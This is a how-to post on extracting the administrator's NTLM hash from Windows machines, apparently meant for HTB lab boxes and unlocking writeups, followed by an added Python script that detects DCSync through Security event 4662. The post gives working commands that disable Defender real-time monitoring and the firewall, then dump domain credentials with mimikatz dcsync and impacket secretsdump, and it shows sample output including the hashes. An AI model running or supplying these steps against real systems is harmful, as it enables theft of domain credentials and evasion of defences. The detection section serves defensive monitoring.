
[How-To] Extract NTLM hash

Preface: If you want to decrypt a writeup for an active Windows box on HTB or other platforms using the NTLM hash of the administrator user, you are in the right place. In this How-To post I will show you how to extract the NTLM hash of the administrator user (and probably of any other user) on Windows machines.

First we will use mimikatz. In the second example I will show you how to use secretsdump for the same purpose.

Using mimikatz

After getting a shell as administrator you can follow the steps below to extract the NTLM hash.

First disable the real-time protection if it's enabled:

Set-MpPreference -DisableRealtimeMonitoring $true

Then disable the Windows Firewall for the current profile:

netsh advfirewall set currentprofile state off

Then run mimikatz with the following arguments:

./mimikatz.exe "lsadump::dcsync /user:administrator"

You will get an output like this:

C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb  8 2020 12:26:09
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 1/24/2020 9:14:15 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff

The NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff. Just copy and paste it into the writeup where it is asked for.

Using secretsdump

If you have owned a machine and you have the password of the administrator user, you can get the NTLM hash using secretsdump. secretsdump is a tool from impacket-tools.

secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::

The hash is divided into two sections: the first is the LM hash and the second is the NTLM hash.

Here the NTLM hash is d9485863c1b9e07543aa40cbb4ab9dfd. Just copy and paste it into the writeup where it is asked for.
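
Both methods above pull the hash over directory replication (lsadump::dcsync in mimikatz, the DRSUAPI method in the secretsdump output), which a domain controller can record as Security event 4662. The following is an added example, not part of the original post: a Python check that flags replication rights exercised by accounts other than known replicators. The flattened JSON layout, the sample events and the KNOWN_REPLICATORS allowlist are constructed assumptions, and 4662 is only logged when directory service access auditing is enabled.

```python
import json

# Control-access rights requested during directory replication (AD schema GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumption: the only legitimate replicator is the DC's machine account
# (machine.domain.LOCAL in the output above). Add sync service accounts here.
KNOWN_REPLICATORS = {"machine$"}

# Constructed sample: Security event 4662 records flattened to JSON lines.
SAMPLE_EVENTS = r"""
{"EventID": 4662, "SubjectUserName": "MACHINE$", "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "Administrator", "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "Administrator", "AccessMask": "0x100", "Properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"}
{"EventID": 4662, "SubjectUserName": "helpdesk", "AccessMask": "0x10", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"}
{"EventID": 4624, "SubjectUserName": "helpdesk"}
"""


def requested_rights(properties):
    """Return the replication rights named in a 4662 Properties field."""
    props = properties.lower()
    return {name for guid, name in REPLICATION_RIGHTS.items() if guid in props}


def find_dcsync(lines, known=KNOWN_REPLICATORS):
    """Map each unexpected account to the replication rights it exercised."""
    hits = {}
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        # 0x100 is the Control Access mask used for extended rights.
        if event.get("EventID") != 4662 or event.get("AccessMask") != "0x100":
            continue
        rights = requested_rights(event.get("Properties", ""))
        user = event.get("SubjectUserName", "")
        if rights and user.lower() not in known:
            hits.setdefault(user, set()).update(rights)
    return {user: sorted(r) for user, r in hits.items()}


if __name__ == "__main__":
    for user, rights in find_dcsync(SAMPLE_EVENTS.splitlines()).items():
        print(f"possible DCSync by {user}: {', '.join(rights)}")
```

A user account requesting both Get-Changes and Get-Changes-All from a host that is not a domain controller is the pattern to alert on; the allowlist should name real replicators explicitly rather than trusting every machine account.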